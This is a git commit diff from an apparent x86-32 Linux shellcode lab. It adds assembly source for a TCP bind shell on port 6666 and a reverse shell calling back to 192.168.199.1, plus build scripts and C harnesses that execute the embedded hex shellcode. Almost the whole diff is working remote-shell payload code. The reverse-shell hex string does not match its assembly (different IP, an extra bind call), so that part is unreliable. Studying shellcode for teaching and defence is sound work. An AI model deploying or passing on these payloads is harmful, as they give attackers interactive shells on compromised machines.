New commit. Added also NetworkShells.

2017-02-01 13:15:17 +01:00
parent 5d7498d6bd
commit 8348a251e3
34 changed files with 802 additions and 0 deletions
--- a/x86_32/0x2_NetworkShells/0x2_ShellcodeLab_32Bit_NetworkShells.pdf
+++ b/x86_32/0x2_NetworkShells/0x2_ShellcodeLab_32Bit_NetworkShells.pdf
--- a/x86_32/0x2_NetworkShells/bindshell_tcp/bindtcp.asm
+++ b/x86_32/0x2_NetworkShells/bindshell_tcp/bindtcp.asm
@@ -0,0 +1,115 @@
+BITS 32
+global _start
+
+; basic bindshell for shellcode lab
+; by dash
+
+_start:
+; all syscalls /usr/include/i386-linux-gnu/asm/unistd_32.h
+; in difference we have to specify everything via socketcall
+; int socketcall(int call, unsigned long *args);
+; 66h / 102 is socketcall
+; /usr/include/linux/net.h
+
+; we need a socket, PF_INET, SOCK_STREAM, IPPROTO
+; its *not* sys/socket
+; go to /usr/include/bits/socket.h for domain
+; go to /usr/include/bits/socket_type.h for type
+; go to /usr/include/netinet/in.h for protocol
+
+; define socket
+xor		eax, eax		; clean accumulator
+xor		ebx, ebx
+xor		edx, edx	; prepare edx for null
+mov		al, 0x66
+mov		bl, 0x1		; SYS_SOCKET (/usr/include/linux/net.h) 
+push	edx			; IPPROTO == 0
+push	0x1			; SOCK_STREAM == 1
+push	0x2			; AF_INET / PF_INET == 2
+mov		ecx,esp
+int		0x80
+
+; define bind
+; EAX has socket fd
+; /usr/include/linux/in.h
+; #define __SOCK_SIZE__   16      /* sizeof(struct sockaddr)  */
+; typedef unsigned short int sa_family_t;
+; struct sockaddr {
+; sa_family_t sa_family;		unsigned short int 2 byte
+; char        sa_data[14]; }
+
+; we do not want to specify a special ip address
+; we simply define 0.0.0.0 with nulled register
+xchg	edi, eax
+push 	edx				; 0.0.0.0
+push	word 0x0A1A		; PORT 6666
+push	word 0x2		; AF_INET, sin_family
+mov		ecx, esp		; struct sockaddr *addr
+mov		esi, ecx		; save struct sockaddr for later use in ESI
+push	0x10			; socklen_t addrlen
+push	ecx				; sockaddr *addr
+push	edi				; socket fd
+mov		ecx, esp
+mov		bl,0x2			; SYS_BIND
+xor		eax, eax		; clean accumulator
+mov		al,0x66			; SYS_SOCKETCALL
+int		0x80
+
+; define listen
+; do socketcall
+; SYS_LISTEN 4
+; int listen(int sockfd, int backlog);
+; 
+xor		eax, eax
+mov		al,0x66		; SYS_SOCKETCALL
+mov		bl,0x4		; SYS_LISTEN, 1st Argument to SYS_SOCKETCALL
+push	0x1			; backlog
+push	edi			; sockfd
+mov		ecx, esp	; 2nd argument to SYS_SOCKETCALL
+int		0x80
+
+; define accept
+; SYS_ACCEPT 5
+; int accept(int sockfd, struct sockaddr *addr,socklen_t *addrlen);
+; addr + addrlen for client, but we dont care about that
+
+xor		eax, eax		; clean accumulator
+mov		al,0x66
+mov		bl,0x5
+push	edx				; flags, null
+push	edx
+push	edi
+mov		ecx, esp
+int		0x80
+
+; define dup2
+; dup2 duplicate the FDs to the shell 
+; new sockfd is in EAX
+; int dup2(int oldfd, int newfd);
+
+xor		ecx, ecx
+mov		cl,0x2
+xchg	ebx,eax
+loop:
+xor		eax, eax		; clean accumulator
+mov		al,0x3F
+int		0x80
+dec		ecx
+jns		loop		; if ecx is *not* -1 (SIGN Flag)
+
+; define execve
+; spawning a shell
+; int execve(const char *filename, char *const argv[], char *const envp[]);
+; 
+
+xor		eax, eax		; clean accumulator
+xor		esi, esi
+push 	esi
+mov		edx, esp		; 3rd argument
+push	esi				; NULL 
+push	0x68732f6e		; n/sh
+push	0x69622f2f		; //bi
+mov		ebx, esp		; 1st argument
+mov		ecx, edx		; 2nd argument
+mov		al,0xb
+int		0x80
--- a/x86_32/0x2_NetworkShells/bindshell_tcp/build_x86.sh
+++ b/x86_32/0x2_NetworkShells/bindshell_tcp/build_x86.sh
@@ -0,0 +1,15 @@
+#!/bin/bash
+# easy build script for shellcode class
+
+if [ $# -ne 1 ];
+then
+echo "what is the name of the sourcefile, without .asm please"
+exit
+fi
+
+name=$1
+
+nasm -f elf32 $name.asm -o $name.o;ld -m elf_i386 -o $name $name.o
+md5sum $name
+ls -al $name
+echo "Done"
--- a/x86_32/0x2_NetworkShells/bindshell_tcp/testit.c
+++ b/x86_32/0x2_NetworkShells/bindshell_tcp/testit.c
@@ -0,0 +1,12 @@
+#include <stdio.h>
+
+unsigned char shellcode[] = \
+"\x31\xc0\x31\xdb\x31\xd2\xb0\x66\xb3\x01\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x97\x52\x66\x68\x1a\x0a\x66\x6a\x02\x89\xe1\x89\xce\x6a\x10\x51\x57\x89\xe1\xb3\x02\x31\xc0\xb0\x66\xcd\x80\x31\xc0\xb0\x66\xb3\x04\x6a\x01\x57\x89\xe1\xcd\x80\x31\xc0\xb0\x66\xb3\x05\x52\x52\x57\x89\xe1\xcd\x80\x31\xc9\xb1\x02\x93\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf7\x31\xc0\x31\xf6\x56\x89\xe2\x56\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xb0\x0b\xcd\x80";
+main()
+{
+printf("Shellcode Length:  %d\n", sizeof(shellcode) - 1);
+int (*ret)() = (int(*)())shellcode;
+ret();
+}
+
+
--- a/x86_32/0x2_NetworkShells/reverseshell_tcp/build_x86.sh
+++ b/x86_32/0x2_NetworkShells/reverseshell_tcp/build_x86.sh
@@ -0,0 +1,15 @@
+#!/bin/bash
+# easy build script for shellcode class
+
+if [ $# -ne 1 ];
+then
+echo "what is the name of the sourcefile, without .asm please"
+exit
+fi
+
+name=$1
+
+nasm -f elf32 $name.asm -o $name.o;ld -m elf_i386 -o $name $name.o
+md5sum $name
+ls -al $name
+echo "Done"
--- a/x86_32/0x2_NetworkShells/reverseshell_tcp/revtcp.asm
+++ b/x86_32/0x2_NetworkShells/reverseshell_tcp/revtcp.asm
@@ -0,0 +1,78 @@
+BITS 32
+global _start
+
+; basic reverseshell for shellcode lab
+; by dash
+
+_start:
+; all syscalls /usr/include/i386-linux-gnu/asm/unistd_32.h
+; in difference we have to specify everything via socketcall
+; int socketcall(int call, unsigned long *args);
+; 66h / 102 is socketcall
+; /usr/include/linux/net.h
+
+; we need a socket, PF_INET, SOCK_STREAM, IPPROTO
+; its *not* sys/socket
+; go to /usr/include/bits/socket.h for domain
+; go to /usr/include/bits/socket_type.h for type
+; go to /usr/include/netinet/in.h for protocol
+
+; define socket
+xor		eax, eax	; clean accumulator
+xor		ebx, ebx	; clean it as well
+xor		edx, edx	; prepare edx for null
+mov		al, 0x66	; put 102 into AL, sys_socketcall
+mov		bl, 0x1		; SYS_SOCKET (/usr/include/linux/net.h) 
+push	edx			; IPPROTO == 0
+push	0x1			; SOCK_STREAM == 1
+push	0x2			; AF_INET / PF_INET == 2
+mov		ecx,esp
+int		0x80
+
+; connect
+; call is basically the same as bind
+;xchg	edi, eax
+push 	0x01C7A8C0		; 192.168.199.1
+push	word 0x0A1A		; PORT 6666
+push	word 0x2		; AF_INET, sin_family
+mov		ecx, esp		; struct sockaddr *addr
+mov		esi, ecx		; save struct sockaddr for later use in ESI
+push	0x10			; socklen_t addrlen
+push	ecx				; sockaddr *addr
+push	edi				; socket fd
+mov		ecx, esp
+mov		bl,0x3			; SYS_CONNECT
+xor		eax, eax		; clean accumulator
+mov		al,0x66			; SYS_SOCKETCALL
+int		0x80
+; define dup2
+; dup2 duplicate the FDs to the shell 
+; new sockfd is in EAX
+; int dup2(int oldfd, int newfd);
+
+xor		ecx, ecx
+mov		cl,0x2
+mov		ebx,edi
+loop:
+xor		eax, eax		; clean accumulator
+mov		al,0x3F
+int		0x80
+dec		ecx
+jns		loop		; if ecx is *not* -1 (SIGN Flag)
+
+; define execve
+; spawning a shell
+; int execve(const char *filename, char *const argv[], char *const envp[]);
+; 
+
+xor		eax, eax		; clean accumulator
+xor		esi, esi
+push 	esi
+mov		edx, esp		; 3rd argument
+push	esi				; NULL 
+push	0x68732f6e		; n/sh
+push	0x69622f2f		; //bi
+mov		ebx, esp		; 1st argument
+mov		ecx, edx		; 2nd argument
+mov		al,0xb
+int		0x80
--- a/x86_32/0x2_NetworkShells/reverseshell_tcp/testit.c
+++ b/x86_32/0x2_NetworkShells/reverseshell_tcp/testit.c
@@ -0,0 +1,12 @@
+#include <stdio.h>
+
+unsigned char shellcode[] = \
+"\x31\xc0\x31\xdb\x31\xd2\xb0\x66\xb3\x01\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x97\x52\x66\x68\x1b\x0a\x66\x6a\x02\x89\xe1\x89\xce\x6a\x10\x51\x57\x89\xe1\xb3\x02\x31\xc0\xb0\x66\xcd\x80\x68\xc0\xa8\xc7\x67\x66\x68\x1a\x0a\x66\x6a\x02\x89\xe1\x89\xce\x6a\x10\x51\x57\x89\xe1\xb3\x03\x31\xc0\xb0\x66\xcd\x80\x31\xc9\xb1\x02\x89\xfb\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf7\x31\xc0\x31\xf6\x56\x89\xe2\x56\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xb0\x0b\xcd\x80";
+main()
+{
+printf("Shellcode Length:  %d\n", sizeof(shellcode) - 1);
+int (*ret)() = (int(*)())shellcode;
+ret();
+}
+
+